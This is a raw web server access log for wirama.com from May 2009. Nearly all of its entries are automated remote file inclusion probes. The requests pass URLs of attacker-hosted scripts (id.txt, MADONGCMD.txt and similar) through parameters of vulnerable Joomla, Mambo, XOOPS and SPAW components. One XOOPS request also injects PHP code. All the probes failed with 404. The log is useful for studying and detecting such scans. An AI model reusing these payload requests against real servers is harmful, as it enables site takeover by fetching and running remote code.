200.103.16.43 - - [02/May/2009:01:32:42 -0700] "GET /ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:01:32:42 -0700] "GET /logs/ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:01:32:45 -0700] "GET /logs/access_090331.log%20%20/ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.53.250.98 - - [02/May/2009:01:36:16 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.53.250.98 - - [02/May/2009:01:36:21 -0700] "GET /skin/zero_vote/error.php?dir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.53.250.98 - - [02/May/2009:01:36:24 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
200.103.16.43 - - [02/May/2009:01:37:15 -0700] "GET /ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:01:37:15 -0700] "GET /logs/access_090401.log/ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:01:37:15 -0700] "GET /logs/ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:01:37:27 -0700] "GET /logs/access_090331.log/ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:01:43:12 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.project80s.com/phpsessions/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "wirama.com"
200.103.16.43 - - [02/May/2009:01:43:12 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.project80s.com/phpsessions/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "wirama.com"
200.103.16.43 - - [02/May/2009:01:43:12 -0700] "GET /logs/access_090331.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.project80s.com/phpsessions/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "wirama.com"
200.103.16.43 - - [02/May/2009:01:43:47 -0700] "GET /ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:01:43:47 -0700] "GET /logs/ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:01:43:55 -0700] "GET /logs/access_090331.log%20%20/ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [02/May/2009:01:44:07 -0700] "GET /logs//components/com_virtuemart/image.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [02/May/2009:01:44:07 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/image.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [02/May/2009:01:44:07 -0700] "GET /components/com_virtuemart/image.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:01:46:47 -0700] "GET /ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:01:46:47 -0700] "GET /logs/ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:01:46:47 -0700] "GET /logs/access_090401.log/ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:01:46:59 -0700] "GET /logs/access_090331.log/ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.185.20.88 - - [02/May/2009:01:50:50 -0700] "GET /logs//components/com_virtuemart/image.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [02/May/2009:01:50:50 -0700] "GET /components/com_virtuemart/image.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [02/May/2009:01:50:50 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/image.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:01:57:23 -0700] "GET /ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:01:57:23 -0700] "GET /logs/access_090401.log/ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:01:57:23 -0700] "GET /logs/access_090331.log/ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:01:57:23 -0700] "GET /logs/ask_password?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.125.167.2 - - [02/May/2009:02:00:42 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.125.167.2 - - [02/May/2009:02:00:42 -0700] "GET /logs/access_090401.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.125.167.2 - - [02/May/2009:02:00:42 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.125.167.2 - - [02/May/2009:02:01:54 -0700] "GET /logs/access_090331.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.185.20.88 - - [02/May/2009:02:02:38 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [02/May/2009:02:02:38 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [02/May/2009:02:02:38 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
125.251.133.3 - - [02/May/2009:02:02:39 -0700] "GET /logs/access_090329.log//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
125.251.133.3 - - [02/May/2009:02:02:39 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
125.251.133.3 - - [02/May/2009:02:02:40 -0700] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
202.62.61.45 - - [02/May/2009:02:03:32 -0700] "GET /logs/access_090329.log//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.62.61.45 - - [02/May/2009:02:03:33 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.62.61.45 - - [02/May/2009:02:03:34 -0700] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
200.103.16.43 - - [02/May/2009:02:13:51 -0700] "GET /logs/access_090330.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.arnoldsales.com/bin1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:02:13:51 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.arnoldsales.com/bin1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:02:13:51 -0700] "GET /logs/access_090329.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.arnoldsales.com/bin1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:02:13:51 -0700] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.arnoldsales.com/bin1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.106.203 - - [02/May/2009:02:32:32 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
66.232.102.70 - - [02/May/2009:02:55:17 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://shop.ars-bitterfeld.de/tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.232.102.70 - - [02/May/2009:02:55:17 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://shop.ars-bitterfeld.de/tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.232.102.70 - - [02/May/2009:02:55:17 -0700] "GET /logs/access_090330.log//components/com_simpleboard/file_upload.php?sbp=http://shop.ars-bitterfeld.de/tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.213.0.1 - - [02/May/2009:03:10:39 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://m0nello.altervista.org/conf/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.wirama.com"
200.213.0.1 - - [02/May/2009:03:10:39 -0700] "GET /index.php?DOCUMENT_ROOT=http://m0nello.altervista.org/conf/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.wirama.com"
200.213.0.1 - - [02/May/2009:03:10:39 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://m0nello.altervista.org/conf/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.wirama.com"
200.213.0.1 - - [02/May/2009:03:10:40 -0700] "GET /logs/errors.php?error=http://m0nello.altervista.org/conf/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.wirama.com"
200.213.0.1 - - [02/May/2009:03:10:40 -0700] "GET /logs/access.log/errors.php?error=http://m0nello.altervista.org/conf/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:03:16:54 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:03:16:54 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:03:16:54 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:03:20:45 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:03:25:16 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:03:25:16 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:03:25:16 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [02/May/2009:03:28:25 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.118.90.253 - - [02/May/2009:03:33:05 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.footnoteibs.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
64.118.90.253 - - [02/May/2009:03:33:05 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.footnoteibs.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
72.82.228.83 - - [02/May/2009:03:44:19 -0700] "GET /appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.82.228.83 - - [02/May/2009:03:44:19 -0700] "GET /logs/appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.82.228.83 - - [02/May/2009:03:44:19 -0700] "GET /logs/access.log%20%20/appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.82.228.83 - - [02/May/2009:03:44:38 -0700] "GET /appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.82.228.83 - - [02/May/2009:03:44:38 -0700] "GET /logs/access.log%20%20/appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.82.228.83 - - [02/May/2009:03:44:38 -0700] "GET /logs/appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.6.17.163 - - [02/May/2009:04:16:26 -0700] "GET /logs/ HTTP/1.0" 200 1929 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
200.103.16.43 - - [02/May/2009:04:17:08 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:04:17:08 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:04:17:08 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.185.20.88 - - [02/May/2009:04:25:29 -0700] "GET /logs/access_090301.log//poll/png.php?include_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.185.20.88 - - [02/May/2009:04:25:29 -0700] "GET /poll/png.php?include_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.185.20.88 - - [02/May/2009:04:25:29 -0700] "GET /logs//poll/png.php?include_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.185.20.88 - - [02/May/2009:04:36:51 -0700] "GET /poll/png.php?include_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.185.20.88 - - [02/May/2009:04:36:51 -0700] "GET /logs/access_090301.log//poll/png.php?include_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.185.20.88 - - [02/May/2009:04:36:51 -0700] "GET /logs//poll/png.php?include_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.140.23.192 - - [02/May/2009:04:52:34 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.140.23.192 - - [02/May/2009:04:52:34 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.140.23.192 - - [02/May/2009:04:52:34 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [02/May/2009:04:55:39 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [02/May/2009:04:55:39 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [02/May/2009:04:55:39 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.140.23.192 - - [02/May/2009:04:58:26 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
68.171.52.5 - - [02/May/2009:05:25:19 -0700] "GET /logs/access_090401.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
68.171.52.5 - - [02/May/2009:05:25:19 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
68.171.52.5 - - [02/May/2009:05:25:19 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
68.171.52.5 - - [02/May/2009:05:25:59 -0700] "GET /logs/access_090301.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.165.73.157 - - [02/May/2009:05:27:56 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.165.73.157 - - [02/May/2009:05:27:56 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.165.73.157 - - [02/May/2009:05:27:56 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.239.227.174 - - [02/May/2009:05:28:30 -0700] "GET /logs//index2.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.basza.com.ar/site2008//administrator/components/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
222.239.227.174 - - [02/May/2009:05:28:31 -0700] "GET /index2.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.basza.com.ar/site2008//administrator/components/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
222.239.227.174 - - [02/May/2009:05:37:02 -0700] "GET /logs//index2.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.basza.com.ar/site2008//administrator/components/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
222.239.227.174 - - [02/May/2009:05:37:03 -0700] "GET /index2.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.basza.com.ar/site2008//administrator/components/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
204.11.53.20 - - [02/May/2009:05:39:27 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://abaaa.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
204.11.53.20 - - [02/May/2009:05:39:27 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://abaaa.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
80.172.236.56 - - [02/May/2009:05:40:05 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.172.236.56 - - [02/May/2009:05:40:05 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.172.236.56 - - [02/May/2009:05:40:05 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.172.236.56 - - [02/May/2009:05:44:47 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.172.236.56 - - [02/May/2009:05:44:47 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.172.236.56 - - [02/May/2009:05:44:47 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.239.227.229 - - [02/May/2009:05:45:17 -0700] "GET /logs//index2.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.basza.com.ar/site2008//administrator/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
222.239.227.229 - - [02/May/2009:05:45:18 -0700] "GET /index2.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.basza.com.ar/site2008//administrator/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
80.172.236.56 - - [02/May/2009:05:54:35 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
80.172.236.56 - - [02/May/2009:05:54:35 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
80.172.236.56 - - [02/May/2009:05:54:35 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
216.120.241.252 - - [02/May/2009:05:56:53 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.islander90.com/images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
216.120.241.252 - - [02/May/2009:05:56:53 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.islander90.com/images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
216.120.241.252 - - [02/May/2009:05:56:53 -0700] "GET /logs/access.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.islander90.com/images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.172.236.56 - - [02/May/2009:05:59:45 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.172.236.56 - - [02/May/2009:05:59:45 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.172.236.56 - - [02/May/2009:05:59:45 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
